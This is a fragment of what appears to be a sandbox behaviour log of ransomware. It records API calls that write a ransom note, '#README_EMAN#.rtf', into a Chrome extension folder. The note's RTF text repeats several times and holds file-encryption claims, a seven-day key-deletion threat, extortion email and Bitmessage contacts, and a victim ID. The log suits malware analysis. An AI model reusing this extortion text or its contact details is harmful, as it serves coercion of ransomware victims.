th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.144] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.145] CloseHandle (hObject=0x2e8) returned 1 [0292.145] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\#readme_eman#.rtf")) returned 0xffffffff [0292.145] GetLastError () returned 0x2 [0292.145] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b 